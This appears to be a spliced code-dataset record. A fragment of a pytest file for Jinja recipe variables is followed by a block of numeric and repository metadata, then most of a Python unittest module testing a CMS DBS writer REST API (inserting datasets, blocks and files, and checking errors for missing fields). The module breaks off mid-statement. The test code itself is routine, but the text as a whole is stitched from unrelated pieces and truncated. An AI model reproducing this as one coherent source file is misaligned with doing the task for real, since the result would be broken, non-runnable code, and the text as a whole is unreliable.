    for var_name, new_value in (("name", "NEW_NAME"), ("version", "3.2.1")):
        set_global_jinja_var(simple_full_recipe, var_name, new_value)
        assert get_global_jinja_var(simple_full_recipe, var_name) == new_value
def test_set_global_jinja_var_multiple_one_line(multiple_jinja_var_same_line):
    """Overwriting works even when several variables share one line."""
    for var_name, new_value in (("name", "NEW_NAME"), ("version", "3.2.1")):
        set_global_jinja_var(multiple_jinja_var_same_line, var_name, new_value)
        assert get_global_jinja_var(multiple_jinja_var_same_line, var_name) == new_value
| 39.904762
| 87
| 0.794153
| 267
| 1,676
| 4.41573
| 0.142322
| 0.196777
| 0.237489
| 0.173028
| 0.898219
| 0.890585
| 0.780322
| 0.717557
| 0.668363
| 0.502969
| 0
| 0.018654
| 0.104415
| 1,676
| 41
| 88
| 40.878049
| 0.766822
| 0
| 0
| 0
| 0
| 0
| 0.106205
| 0
| 0
| 0
| 0
| 0
| 0.407407
| 1
| 0.222222
| false
| 0
| 0.037037
| 0
| 0.259259
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
31c49cc9638e6d1bf1a475de373d6b09644a51a5
| 56,776
|
py
|
Python
|
Server/Python/tests/dbsserver_t/unittests/web_t/DBSWriterModel_t.py
|
vkuznet/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 8
|
2015-08-14T04:01:32.000Z
|
2021-06-03T00:56:42.000Z
|
Server/Python/tests/dbsserver_t/unittests/web_t/DBSWriterModel_t.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 162
|
2015-01-07T21:34:47.000Z
|
2021-10-13T09:42:41.000Z
|
Server/Python/tests/dbsserver_t/unittests/web_t/DBSWriterModel_t.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 16
|
2015-01-22T15:27:29.000Z
|
2021-04-28T09:23:28.000Z
|
"""
web unittests
"""
from __future__ import print_function
__revision__ = "$Id: DBSWriterModel_t.py,v 1.27 2010/08/24 19:48:44 yuyi Exp $"
__version__ = "$Revision: 1.27 $"
import os
import sys
import unittest
import time
import uuid
import traceback
from ctypes import *
from cherrypy import request, response, HTTPError
from dbsserver_t.utils.DBSRestApi import DBSRestApi
from WMCore.WebTools.FrontEndAuth import FrontEndAuth
# --- Module-wide configuration and unique fixture names ---------------------
# The DBS server under test is reached through DBSRestApi; the config file
# path is required from the environment, the service name is optional.
config = os.environ["DBS_TEST_CONFIG"]
service = os.environ.get("DBS_TEST_SERVICE", "DBSWriter")
api = DBSRestApi(config, service)

# Per-run unique suffix so repeated test runs do not collide on names.
uid = uuid.uuid4().time_mid
print("****uid=%s******" %uid)

acquisition_era_name="Acq_Era_%s" %uid
# Wrap large uids so processing_version stays below 9999.
processing_version="%s" %(uid if (uid<9999) else uid%9999)
primary_ds_name = 'unittest_web_primary_ds_name_%s' % uid
procdataset = '%s-unittest_web_dataset-v%s' % (acquisition_era_name, processing_version)
childprocdataset = '%s-unittest_web_child_dataset-v%s' % (acquisition_era_name, processing_version)
parent_procdataset = '%s-unittest_web_parent_dataset-v%s' % (acquisition_era_name, processing_version)
tier = 'GEN-SIM-RAW'
tier2 = 'RAW'
# Dataset paths follow the /<primary>/<processed>/<tier> convention.
dataset="/%s/%s/%s" % (primary_ds_name, procdataset, tier)
dataset2="/%s/%s/%s" % (primary_ds_name, procdataset, tier2)
child_dataset="/%s/%s/%s" % (primary_ds_name, childprocdataset, tier)
print("dataset = ", dataset)
print("dataset2 = ", dataset2)
print("child_dataset = ", child_dataset)
app_name='cmsRun'
output_module_label='Merged-%s' %uid
global_tag='my_tag-%s'%uid
pset_hash='76e303993a1c2f842159dbfeeed9a0dd'
release_version='CMSSW_1_2_%s' % uid
site="cmssrm-%s.fnal.gov" %uid
# Block names are "<dataset>#<uid>".
block="%s#%s" % (dataset, uid)
block2="%s#%s" % (dataset2, uid)
child_block="%s#%s" % (child_dataset, uid)
# NOTE(review): parent_block is built from the bare processed-dataset name,
# not a full /primary/processed/tier path like the others -- confirm intended.
parent_block="%s#%s" % (parent_procdataset, uid)
run_num=uid
flist=[]
primary_ds_type='test'
prep_id = 'MC_12344'
child_prep_id = 'MC_3455'
stepchain_dataset = "/%s_stepchain/%s/%s" % (primary_ds_name, procdataset, tier)
stepchain_block="%s#%s" % (stepchain_dataset, uid)
parent_stepchain_dataset="/%s_stepchain/%s/%s" % (primary_ds_name, parent_procdataset, tier)
parent_stepchain_block="%s#%s" % (parent_stepchain_dataset, uid)
# NOTE(review): these two prints are labelled "stepchain" but print the
# non-stepchain parent_block/block values -- looks like a copy/paste slip.
print("parent_stepchain_block = ", parent_block)
print("stepchain_block = ", block)

# Everything the individual tests created, bundled for downstream consumers.
outDict={
    "primary_ds_name" : primary_ds_name,
    "procdataset" : procdataset,
    "tier" : tier,
    "dataset" : dataset,
    "child_dataset" : child_dataset,
    "app_name" : app_name,
    "output_module_label" : output_module_label,
    "global_tag": global_tag,
    "pset_hash" : pset_hash,
    "release_version" : release_version,
    "site" : site,
    "block" : block,
    "child_block" : child_block,
    "files" : [],
    "parent_files" : [],
    "run_num":run_num,
    "acquisition_era":acquisition_era_name,
    "processing_version" : processing_version,
    "primary_ds_type" : primary_ds_type,
    "child_prep_id" : child_prep_id,
    "prep_id" : prep_id,
    "stepchain_dataset": stepchain_dataset,
    "stepchain_block": stepchain_block,
    "parent_stepchain_dataset": parent_stepchain_dataset,
    "parent_stepchain_block": parent_stepchain_block,
    "stepchain_files": [],
    "parent_stepchain_files": []
    }
class checkException(object):
    """Decorator for unittest methods that are expected to raise.

    ``@checkException("some text")`` wraps a test method and fails the test
    unless the method raises an exception whose first argument contains the
    given text.  The wrapped method's TestCase instance is taken from
    ``args[0]`` so its ``fail()`` can report problems.
    """
    def __init__(self, msg):
        # Substring that must appear in the raised exception's first argument.
        self.msg = msg

    def __call__(self, func, *args, **kwargs):
        def wrapper(*args, **kwargs):
            out = None
            test_class = args[0]  # the TestCase instance (self of the test)
            try:
                out = func(*args, **kwargs)
            except Exception as ex:
                if self.msg not in ex.args[0]:
                    # BUG FIX: an exception WAS raised here, just not the one
                    # expected; the old message claimed none was raised.
                    test_class.fail("Exception raised with unexpected message: %s" % ex.args[0])
            else:
                test_class.fail("Exception was expected and was not raised")
            return out
        return wrapper
class DBSWriterModel_t(unittest.TestCase):
    def test01a(self):
        """test01a: web.DBSWriterModel.insertPrimaryDataset: basic test\n"""
        # Minimal payload: name plus type is all insertPrimaryDataset needs.
        data = {'primary_ds_name':primary_ds_name,
                'primary_ds_type':primary_ds_type}
        api.insert('primarydatasets', data)
    def test01b(self):
        """test01b: web.DBSWriterModel.insertPrimaryDataset: duplicate should not raise an exception\n"""
        # Re-inserting the same primary dataset must be an idempotent no-op.
        data = {'primary_ds_name':primary_ds_name,
                'primary_ds_type':primary_ds_type}
        api.insert('primarydatasets', data)
    # Server must reject a primary dataset insert with no name.
    @checkException("Primary dataset Name is required for insertPrimaryDataset")
    def test01c(self):
        """test01c: web.DBSWriterModel.insertPrimaryDataset: missing primary_ds_name, must throw exception\n"""
        data = {'primary_ds_type':primary_ds_type}
        junk = api.insert('primarydatasets', data)
    def test02a(self):
        """test 02a: web.DBSWriterModel.insertOutputModule: basic test"""
        # A complete output configuration; later dataset inserts reference it.
        data = {'release_version': release_version, 'pset_hash': pset_hash,
                'app_name': app_name, 'output_module_label': output_module_label, 'global_tag':global_tag}
        api.insert('outputconfigs', data)
    def test02b(self):
        """test02b: web.DBSWriterModel.insertOutputModule: re-insertion should not raise any errors"""
        # Same payload as test02a: duplicates must be accepted silently.
        data = {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                'output_module_label': output_module_label, 'global_tag':global_tag}
        api.insert('outputconfigs', data)
    # Missing app_name must be rejected with a message naming the field.
    @checkException("app_name")
    def test02c(self):
        """test02c: web.DBSWriterModel.insertOutputModule: missing parameter must cause an exception"""
        data = {'pset_hash': pset_hash,
                'output_module_label': output_module_label,
                'release_version': release_version}
        api.insert('outputconfigs', data)
    # Missing pset_hash must be rejected with a message naming the field.
    @checkException("pset_hash")
    def test02d(self):
        """test02d: web.DBSWriterModel.insertOutputModule: missing parameter must cause an exception"""
        data = {'app_name': app_name,
                'output_module_label': output_module_label,
                'release_version': release_version}
        api.insert('outputconfigs', data)
    # Missing output_module_label must be rejected with a message naming it.
    @checkException("output_module_label")
    def test02e(self):
        """test02e: web.DBSWriterModel.insertOutputModule: missing parameter must cause an exception"""
        data = {'pset_hash': pset_hash,
                'app_name': app_name,
                'release_version': release_version}
        api.insert('outputconfigs', data)
    # Missing release_version must be rejected with a message naming it.
    @checkException("release_version")
    def test02f(self):
        """test02f: web.DBSWriterModel.insertOutputModule: missing parameter must cause an exception"""
        data = {'pset_hash': pset_hash,
                'app_name': app_name,
                'output_module_label': output_module_label
                }
        api.insert('outputconfigs', data)
    def test03a(self):
        """test03a: web.DBSWriterModel.insertAcquisitionEra: Basic test """
        data={'acquisition_era_name': acquisition_era_name}
        api.insert('acquisitioneras', data)
    # NOTE(review): unlike test01b/test02b, a duplicate acquisition-era insert
    # is apparently expected to RAISE (message naming the field) -- confirm.
    @checkException("acquisition_era_name")
    def test03b(self):
        """test03b: web.DBSWriterModel.insertAcquisitionEra: duplicate test """
        data={'acquisition_era_name': acquisition_era_name}
        api.insert('acquisitioneras', data)
    # An empty payload must be rejected, naming the missing field.
    @checkException("acquisition_era_name")
    def test03c(self):
        """test03c: web.DBSWriterModel.insertAcquisitionEra: missing parameter should raise an exception """
        data={}
        api.insert('acquisitioneras', data)
    def test04a(self):
        """test04a: web.DBSWriterModel.insertProcessingEra: Basic test """
        data={'processing_version': processing_version, 'description':'this-is-a-test'}
        api.insert('processingeras', data)
    def test04b(self):
        """test04b: web.DBSWriterModel.insertProcessingEra: duplicate test """
        # Re-insert of the same processing era; no @checkException, so this
        # duplicate is expected to succeed.
        data={'processing_version': processing_version, 'description':'this-is-a-test'}
        api.insert('processingeras', data)
    # Missing processing_version must be rejected, naming the field.
    @checkException("processing_version")
    def test04c(self):
        """test04c: web.DBSWriterModel.insertProcessingEra: duplicate test """
        data={'description':'this-is-a-test'}
        api.insert('processingeras', data)
    def test05a(self):
        """test05a: web.DBSWriterModel.insertDataset(Dataset is construct by DBSDatset.): basic test"""
        # Full valid dataset payload: ties together the output config,
        # processing/acquisition eras and primary dataset created by the
        # earlier tests.
        data = {
            'physics_group_name': 'Tracker', 'dataset': dataset,
            'dataset_access_type': 'VALID', 'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
            'output_configs': [
                {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                 'output_module_label': output_module_label, 'global_tag': global_tag},
                ],
            'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
            'prep_id':prep_id,
            'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
        }
        api.insert('datasets', data)
        # Also insert the child dataset so the parentage tests (test07c etc.)
        # have something to attach files to.
        childdata = {
            'physics_group_name': 'Tracker', 'dataset': child_dataset,
            'dataset_access_type': 'VALID', 'processed_ds_name': childprocdataset, 'primary_ds_name': primary_ds_name,
            'output_configs': [
                {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                 'output_module_label': output_module_label, 'global_tag': global_tag},
                ],
            'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
            'prep_id': child_prep_id,
            'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name,
        }
        api.insert('datasets', childdata)
    def test05a2(self):
        """test05a2: web.DBSWriterModel.insertDataset(Dataset is construct by DBSDatset.): basic test\n"""
        # Same as test05a but for the second dataset/tier pair (dataset2,
        # tier2), used later by the events-per-lumi file tests.
        data = {
            'physics_group_name': 'Tracker', 'dataset': dataset2,
            'dataset_access_type': 'VALID', 'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
            'output_configs': [
                {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                 'output_module_label': output_module_label, 'global_tag': global_tag},
                ],
            'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier2,
            'prep_id':prep_id,
            'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
        }
        api.insert('datasets', data)
    def test05b(self):
        """test05b: web.DBSWriterModel.insertDataset: duplicate insert should be ignored"""
        # Identical payload to test05a; no exception decorator because the
        # server is expected to silently accept the duplicate.
        data = {
            'physics_group_name': 'Tracker', 'dataset': dataset,
            'dataset_access_type': 'VALID', 'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
            'output_configs': [
                {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                 'output_module_label': output_module_label, 'global_tag': global_tag},
                ],
            'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
            'prep_id':prep_id,
            'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
        }
        api.insert('datasets', data)
    @checkException("primary_ds_name")
    def test05c(self):
        """test05c: web.DBSWriterModel.insertDataset: missing primary_ds_name must raise an error"""
        # Payload omits primary_ds_name only; everything else is valid.
        data = {
            'physics_group_name': 'Tracker', 'dataset': dataset,
            'dataset_access_type': 'VALID', 'processed_ds_name': procdataset,
            'output_configs': [
                {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                 'output_module_label': output_module_label, 'global_tag': global_tag},
                ],
            'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
            'prep_id':prep_id,
            'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
        }
        api.insert('datasets', data)
    @checkException("dataset_access_type")
    def test05d(self):
        """test05d: web.DBSWriterModel.insertDataset: missing parameter must raise an error"""
        # Payload omits dataset_access_type only.
        data = {
            'physics_group_name': 'Tracker', 'dataset': dataset,
            'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
            'output_configs': [
                {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                 'output_module_label': output_module_label, 'global_tag': global_tag},
                ],
            'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
            'prep_id':prep_id,
            'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
        }
        api.insert('datasets', data)
    @checkException("dataset")
    def test05e(self):
        """test05e: web.DBSWriterModel.insertDataset: missing parameter must raise an error"""
        # Payload omits the dataset name only.
        data = {
            'physics_group_name': 'Tracker',
            'dataset_access_type': 'VALID', 'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
            'output_configs': [
                {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                 'output_module_label': output_module_label, 'global_tag': global_tag},
                ],
            'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
            'prep_id':prep_id,
            'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
        }
        api.insert('datasets', data)
    @checkException("processed_ds_name")
    def test05f(self):
        """test05f: web.DBSWriterModel.insertDataset: missing parameter must raise an error"""
        # Payload omits processed_ds_name only.
        data = {
            'physics_group_name': 'Tracker', 'dataset': dataset,
            'dataset_access_type': 'VALID', 'primary_ds_name': primary_ds_name,
            'output_configs': [
                {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                 'output_module_label': output_module_label, 'global_tag': global_tag},
                ],
            'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
            'prep_id':prep_id,
            'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
        }
        api.insert('datasets', data)
    @checkException("data_tier_name")
    def test05g(self):
        """test05g: web.DBSWriterModel.insertDataset: missing parameter must raise an error"""
        # Payload omits data_tier_name only.
        data = {
            'physics_group_name': 'Tracker', 'dataset': dataset,
            'dataset_access_type': 'VALID', 'processed_ds_name': procdataset, 'primary_ds_name': primary_ds_name,
            'output_configs': [
                {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                 'output_module_label': output_module_label, 'global_tag': global_tag},
                ],
            'xtcrosssection': 123, 'primary_ds_type': 'test',
            'prep_id':prep_id,
            'processing_version': processing_version, 'acquisition_era_name': acquisition_era_name
        }
        api.insert('datasets', data)
    @checkException("acquisition_era_name")
    def test05h(self):
        """test05h: web.DBSWriterModel.insertDataset: no output_configs, must raise an error!"""
        # NOTE(review): the docstring mentions output_configs, but the payload
        # is also missing acquisition_era_name/processing_version and the
        # decorator matches "acquisition_era_name" — presumably that is the
        # error the server raises first; confirm against server validation order.
        data = {
            'dataset': dataset,
            'physics_group_name': 'Tracker', 'primary_ds_name': primary_ds_name,
            'dataset_access_type': 'VALID', 'processed_ds_name': procdataset,
            'xtcrosssection': 123, 'primary_ds_type': 'test', 'data_tier_name': tier,
            'prep_id':prep_id
        }
        api.insert('datasets', data)
def test06a(self):
"""test06a: web.DBSWriterModel.insertBlock: basic test"""
data = {'block_name': block,
'origin_site_name': site }
api.insert('blocks', data)
# insert the child block as well
data = {'block_name': child_block, 'origin_site_name': site }
api.insert('blocks', data)
def test06a2(self):
"""test06a: web.DBSWriterModel.insertBlock: basic test"""
data = {'block_name': block2,
'origin_site_name': site }
api.insert('blocks', data)
def test06b(self):
"""test06b: web.DBSWriterModel.insertBlock: duplicate insert should not raise exception"""
data = {'block_name': block,
'origin_site_name': site }
api.insert('blocks', data)
@checkException("block_name")
def test06c(self):
"""test06c: web.DBSWriterModel.insertBlock: missing parameter should raise exception"""
data = {'origin_site_name': site }
api.insert('blocks', data)
@checkException("origin_site_name")
def test06d(self):
"""test06d: web.DBSWriterModel.insertBlock: missing parameter should raise exception"""
data = {'block_name': block}
api.insert('blocks', data)
    def test07a(self):
        """test07a: web.DBSWriterModel.insertFiles: basic test"""
        # Builds 10 complete file records (with output config and lumi list)
        # for the dataset/block created earlier; run_num comes from the
        # module-level uid.
        data={}
        flist=[]
        for i in range(10):
            f={
                'adler32': '', 'file_type': 'EDM',
                'file_output_config_list':
                 [
                  {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                   'output_module_label': output_module_label, 'global_tag': global_tag},
                 ],
                'dataset': dataset,
                'file_size': u'2012211901', 'auto_cross_section': 0.0,
                'check_sum': u'1504266448',
                'file_lumi_list': [
                  {'lumi_section_num': u'27414', 'run_num': uid},
                  {'lumi_section_num': u'26422', 'run_num': uid},
                  {'lumi_section_num': u'29838', 'run_num': uid}
                  ],
                'file_parent_list': [ ],
                'event_count': u'1619',
                'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
                'block_name': block,
                #'is_file_valid': 1
               }
            flist.append(f)
        # The initial data={} above is superseded here.
        data={"files":flist}
        api.insert('files', data)
    def test07a2(self):
        """test07a2: web.DBSWriterModel.insertFiles with events per lumi : basic test\n"""
        # Same shape as test07a but for dataset2/block2 with a distinct run
        # number (uid+1) and per-lumi event_count values summing to the
        # file-level event_count of 60.
        data={}
        flist=[]
        for i in range(10):
            f={
                'adler32': '', 'file_type': 'EDM',
                'file_output_config_list':
                 [
                  {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                   'output_module_label': output_module_label, 'global_tag': global_tag},
                 ],
                'dataset': dataset2,
                'file_size': u'2012211901', 'auto_cross_section': 0.0,
                'check_sum': u'1504266448',
                'file_lumi_list': [
                  {'lumi_section_num': u'27414', 'run_num': uid+1, 'event_count': 10},
                  {'lumi_section_num': u'26422', 'run_num': uid+1, 'event_count': 20},
                  {'lumi_section_num': u'29838', 'run_num': uid+1, 'event_count': 30}
                  ],
                'file_parent_list': [ ],
                'event_count': u'60',
                'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/RAW/IDEAL_/%s/%i.root" %(uid+1, i),
                'block_name': block2,
                #'is_file_valid': 1
               }
            flist.append(f)
        data={"files":flist}
        api.insert('files', data)
    def test07b(self):
        """test07b: web.DBSWriterModel.insertFiles: duplicate insert file shuld not raise any errors"""
        # Re-inserts the same LFNs as test07a (duplicates must be ignored)
        # and records them in the module-level outDict for later tests.
        data={}
        flist=[]
        for i in range(10):
            f={
                'adler32': '', 'file_type': 'EDM',
                'file_output_config_list':
                 [
                  {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                   'output_module_label': output_module_label, 'global_tag': global_tag},
                 ],
                'dataset': dataset,
                'file_size': u'2012211901', 'auto_cross_section': 0.0,
                'check_sum': u'1504266448',
                'file_lumi_list': [
                  {'lumi_section_num': u'27414', 'run_num': u'1'},
                  {'lumi_section_num': u'26422', 'run_num': u'1'},
                  {'lumi_section_num': u'29838', 'run_num': u'1'}
                  ],
                'file_parent_list': [ ],
                'event_count': u'1619',
                'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
                'block_name': block,
                #'is_file_valid': 1
               }
            flist.append(f)
            # Remember the LFNs so downstream tests can look them up.
            outDict['files'].append(f['logical_file_name'])
        data={"files":flist}
        api.insert('files', data)
    def test07c(self):
        """test07c: web.DBSWriterModel.insertFiles: with parents"""
        # Inserts child files into child_block, each parented to the
        # corresponding LFN inserted by test07a; both child and parent LFNs
        # are recorded in outDict.
        data={}
        flist=[]
        for i in range(10):
            f={
                'adler32': u'NOSET', 'file_type': 'EDM',
                'file_output_config_list':
                 [
                  {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                   'output_module_label': output_module_label, 'global_tag': global_tag},
                 ],
                'dataset': child_dataset,
                'file_size': u'2012211901', 'auto_cross_section': 0.0,
                'check_sum': u'1504266448',
                'file_lumi_list': [
                  {'lumi_section_num': u'27414', 'run_num': u'1'},
                  {'lumi_section_num': u'26422', 'run_num': u'1'},
                  {'lumi_section_num': u'29838', 'run_num': u'1'}
                  ],
                'file_parent_list': [{"file_parent_lfn": "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i)}],
                'event_count': u'1619',
                'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" %(uid, i),
                'block_name': child_block
                #'is_file_valid': 1
               }
            flist.append(f)
            outDict['files'].append(f['logical_file_name'])
            outDict['parent_files'].append(f['file_parent_list'][0]['file_parent_lfn'])
        data={"files":flist}
        api.insert('files', data)
    @checkException("logical_file_name")
    def test07d(self):
        """test07d: web.DBSWriterModel.insertFiles: missing parameter should raise an exception"""
        # File records deliberately omit logical_file_name.
        data={}
        flist=[]
        for i in range(10):
            f={
                'adler32': '', 'file_type': 'EDM',
                'file_output_config_list':
                 [
                  {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                   'output_module_label': output_module_label, 'global_tag': global_tag},
                 ],
                'dataset': dataset,
                'file_size': u'2012211901', 'auto_cross_section': 0.0,
                'check_sum': u'1504266448',
                'file_lumi_list': [
                  {'lumi_section_num': u'27414', 'run_num': u'1'},
                  {'lumi_section_num': u'26422', 'run_num': u'1'},
                  {'lumi_section_num': u'29838', 'run_num': u'1'}
                  ],
                'file_parent_list': [ ],
                'event_count': u'1619',
                'block_name': block,
                #'is_file_valid': 1
               }
            flist.append(f)
        data={"files":flist}
        api.insert('files', data)
    @checkException("block_name")
    def test07e(self):
        """test07e: web.DBSWriterModel.insertFiles: missing parameter should raise an exception"""
        # File records deliberately omit block_name.
        data={}
        flist=[]
        for i in range(10):
            f={
                'adler32': '', 'file_type': 'EDM',
                'file_output_config_list':
                 [
                  {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                   'output_module_label': output_module_label, 'global_tag': global_tag},
                 ],
                'dataset': dataset,
                'file_size': u'2012211901', 'auto_cross_section': 0.0,
                'check_sum': u'1504266448',
                'file_lumi_list': [
                  {'lumi_section_num': u'27414', 'run_num': u'1'},
                  {'lumi_section_num': u'26422', 'run_num': u'1'},
                  {'lumi_section_num': u'29838', 'run_num': u'1'}
                  ],
                'file_parent_list': [ ],
                'event_count': u'1619',
                'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
                #'is_file_valid': 1
               }
            flist.append(f)
        data={"files":flist}
        api.insert('files', data)
    @checkException("dataset")
    def test07f(self):
        """test07f: web.DBSWriterModel.insertFiles: missing parameter should raise an exception"""
        # File records deliberately omit the dataset key.
        data={}
        flist=[]
        for i in range(10):
            f={
                'adler32': '', 'file_type': 'EDM',
                'file_output_config_list':
                 [
                  {'release_version': release_version, 'pset_hash': pset_hash, 'app_name': app_name,
                   'output_module_label': output_module_label, 'global_tag': global_tag},
                 ],
                'file_size': u'2012211901', 'auto_cross_section': 0.0,
                'check_sum': u'1504266448',
                'file_lumi_list': [
                  {'lumi_section_num': u'27414', 'run_num': u'1'},
                  {'lumi_section_num': u'26422', 'run_num': u'1'},
                  {'lumi_section_num': u'29838', 'run_num': u'1'}
                  ],
                'file_parent_list': [ ],
                'event_count': u'1619',
                'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
                'block_name': block,
                #'is_file_valid': 1
               }
            flist.append(f)
        data={"files":flist}
        api.insert('files', data)
@checkException("check_sum")
def test07g(self):
"""test07g: web.DBSWriterModel.insertFiles: missing check_sum, adler32 or MD5 parameter should raise an exception"""
data={}
flist=[]
for i in range(10):
f={
'dataset': dataset,
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test07h(self):
"""test07h: web.DBSWriterModel.insertFiles: minimal parameters"""
data={}
flist=[]
for i in range(10):
f={
'dataset': dataset,
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
'check_sum' : "1234",
'adler32': "abc123"
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test07i(self):
"""test07i: web.DBSWriterModel.insertFiles: minimal parameters"""
data={}
flist=[]
for i in range(10):
f={
'dataset': dataset,
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
'check_sum' : "1234"
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test07j(self):
"""test07j: web.DBSWriterModel.insertFiles: minimal parameters"""
data={}
flist=[]
for i in range(10):
f={
'dataset': dataset,
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
'adler32': "abc123"
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test07k(self):
"""test07k: web.DBSWriterModel.insertFiles: minimal parameters"""
data={}
flist=[]
for i in range(10):
f={
'dataset': dataset,
'logical_file_name': "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL_/%s/%i.root" %(uid, i),
'block_name': block,
'md5': "abc"
#'is_file_valid': 1
}
flist.append(f)
data={"files":flist}
api.insert('files', data)
def test08a(self):
"""test08a: testweb.DBSWriterModel.insertDataTier: Basic test"""
data = {'data_tier_name':tier}
api.insert('datatiers', data)
@checkException("data_tier_name")
def test08b(self):
"""test08b: web.DBSWriterModel.insertDataTier: missing data should raise exception"""
data = {}
api.insert('datatiers', data)
def test09a(self):
"""test09a: web.DBSWriterModel.updateDatasetType: Basic test """
api.update('datasets', dataset=dataset, dataset_access_type="DEPRECATED")
@checkException("dataset_access_type")
def test09b(self):
"""test22a web.DBSWriterModel.updateDatasetType: Basic test """
api.update('datasets')
@checkException("Invalid Input")
def test09b1(self):
"""test22a web.DBSWriterModel.updateDatasetType with a wrong type: Basic test """
api.update('datasets', dataset=dataset, dataset_access_type="DEPRECAT")
@checkException("dataset")
def test09c(self):
"""test09c: web.DBSWriterModel.updateDatasetType: Basic test """
api.update('datasets', dataset_access_type="DEPRECATED")
def test10a(self):
"""test10a: web.DBSWriterModel.updateFileStatus: Basic test logical_file_name"""
lfn = "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" %(uid, 1)
api.update('files', logical_file_name=lfn, is_file_valid=0)
def test10b(self):
"""test10b: web.DBSWriterModel.updateFileStatus: Basic test logical_file_name list"""
lfn = ["/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" % (uid, 1),
"/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" % (uid, 2)]
api.update('files', logical_file_name=lfn, is_file_valid=0)
def test10c(self):
"""test10c: web.DBSWriterModel.updateFileStatus: Basic test logical_file_name and lost"""
lfn = "/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" %(uid, 1)
api.update('files', logical_file_name=lfn, is_file_valid=0, lost=1)
def test10d(self):
"""test10d: web.DBSWriterModel.updateFileStatus: Basic test logical_file_name list and lost"""
lfn = ["/store/mc/Fall08/BBJets250to500-madgraph/GEN-SIM-RAW/IDEAL-child/%s/%i.root" % (uid, 1),
